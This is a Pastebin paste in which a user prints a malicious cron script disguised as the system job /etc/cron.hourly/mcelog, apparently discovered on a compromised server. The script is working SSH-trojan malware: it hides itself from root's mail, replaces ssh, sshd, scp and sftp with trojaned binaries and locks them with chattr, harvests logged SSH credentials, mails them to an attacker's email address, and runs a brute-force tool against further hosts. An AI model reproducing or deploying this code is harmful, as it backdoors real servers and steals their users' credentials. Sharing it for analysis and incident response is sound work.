Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [sasha@mikbill ~]$ cat /etc/cron.hourly/mcelog
- #!/bin/bash
- #!!!!!!!!!!!!!!!!!!!!!!!!!Oh...and if u want to secure your network contact me @ aliahmet3303@gmail.com!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
- sed -i 's,/etc/cron.hourly/mcelog,/tmp/xREFasdcF,g' /var/spool/mail/root
- plm=`strings /usr/sbin/sshd |grep /var/html/lol`
- #ps=`ps x|grep mcelog`
- if [ "$plm" != "" ]
- then
- echo
- else
- if [ "`ps x|grep mcelog|grep -v mcelog`" != "" ]
- then
- echo
- else
- chattr -suia /usr/bin/ssh
- chattr -suia /usr/bin/sftp
- chattr -suia /usr/sbin/sshd
- chattr -suia /usr/bin/scp
- mv /usr/bin/ssh /etc/rpm
- mv /usr/bin/sftp /etc/rpm
- mv /usr/sbin/sshd /etc/rpm
- mv /usr/bin/scp /etc/rpm
- rm -rf /etc/ssh/sshd_config
- rm -rf /etc/ssh/ssh_config
- cp /usr/include/linux/pam/ssh_config /etc/ssh/ssh_config
- cp /usr/include/linux/pam/sshd_config /etc/ssh/sshd_config
- cp /usr/include/linux/pam/ssh /usr/bin/ssh
- cp /usr/include/linux/pam/sshd /usr/sbin/sshd
- cp /usr/include/linux/pam/scp /usr/bin/scp
- cp /usr/include/linux/pam/sftp /usr/bin/sftp
- chattr +ia /usr/bin/ssh
- chattr +ia /usr/bin/sftp
- chattr +ia /usr/sbin/sshd
- chattr +ia /usr/bin/scp
- mv /usr/bin/chattr /usr/include/linux/.xterm
- /usr/include/linux/.xterm +ia /usr/include/linux/.xterm
- mv /usr/include/linux/pam/chattr /usr/bin/chattr
- /usr/include/linux/.xterm +ia /usr/bin/chattr
- /sbin/iptables -A INPUT -p tcp --dport 22 -j ACCEPT
- /usr/include/linux/libcrypto.b
- /usr/sbin/sshd
- fi
- if [ -f /etc/init.d/sshd ] ;then
- /etc/init.d/sshd restart
- fi
- if [ -f /etc/init.d/ssh ] ;then
- /etc/init.d/ssh restart
- fi
- fi
- /usr/sbin/rd /var/html/lol | grep SSH2_OUT > /etc/.temp
- if [ -s /etc/.temp ] ; then cat /etc/.temp | mail -s "SSH2 detected" aliahmet3303@gmail.com >> /dev/null ; else echo ; fi
- rm -rf /etc/.temp >> /dev/null
- cd /etc
- cat /var/html/lol >> /var/html/.all
- /usr/sbin/rd /var/html/lol|awk -F" " '{print $2}'|sort -u > mfu.txt
- echo "root xxx" > pass_file
- /usr/sbin/rd /var/html/lol|awk -F" " '{print $4" "$6}'|sort -u > pass_file
- /etc/bash 200
- #rm -rf mfu.txt
- if [ -s vuln.txt ] ; then cat vuln.txt|grep -v DUP|grep -v xxx|mail -s 'gosh' aliahmet3303@gmail.com
- cat vuln.txt|grep -v DUP|grep -v xxx >> /var/html/.global ; fi
- rm -rf /var/html/lol vuln.txt mfu.txt pass_file
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement